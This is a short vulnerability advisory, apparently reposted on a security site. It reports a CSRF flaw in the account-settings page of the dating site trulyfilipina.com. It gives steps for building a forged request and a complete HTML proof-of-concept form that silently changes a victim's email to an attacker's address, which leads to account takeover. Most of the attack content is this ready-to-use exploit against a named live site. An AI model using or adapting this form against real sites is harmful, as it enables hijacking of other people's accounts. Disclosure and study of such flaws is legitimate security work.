XSRF Vunlerability in trulyfilipina.com leads to full account takeover

2019.06.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##################################################################### # Title : XSRF Vunlerability in trulyfilipina.com leads to full account takeover # Founder : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16 # Date : /04/06/2019 # Home : Annaba ( Algeria ) # Tested on : Linux ( Backbox ) ###################################################################### # Happy Eid for everyone :D ## Poc ## [ + ] Creart account then login into the website [ + ] Go to to this path https://v1.trulyfilipina.com/settings/manageaccount/ Then intercept the request And generate CSRF Poc [ + ] Edit the values then send this form to the victim while he opens the form the server will accept the fake request the we made and victim's data will be changed without his knowing Usually hackers use this vunlerability to get full acces and take over the whole account without the victim's knowing ----------------------------- Vunlerable Form ------------------------------------------------------ <!-- Csrf Poc --> <form action="https://v1.trulyfilipina.com/settings/manageaccount/" class="form-horizontal" role="form" id="MemberManageaccountForm" method="post" accept-charset="utf-8"> <input type="hidden" name="_method" value="POST"/> <input name="data[Member][email]" value="hackedbybassem@gmail.com" maxlength="255" type="hidden" id="MemberEmail" required="required"/> <input name="data[Member][password]" class="form-control" value="" type="hidden" id="MemberPassword"/> <input name="data[Member][repassword]" class="form-control" value="" type="hidden" id="MemberRepassword"/> <input type="submit"/> </form> ------------------------------------------------------------- Sh00tz To my pc :V --------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top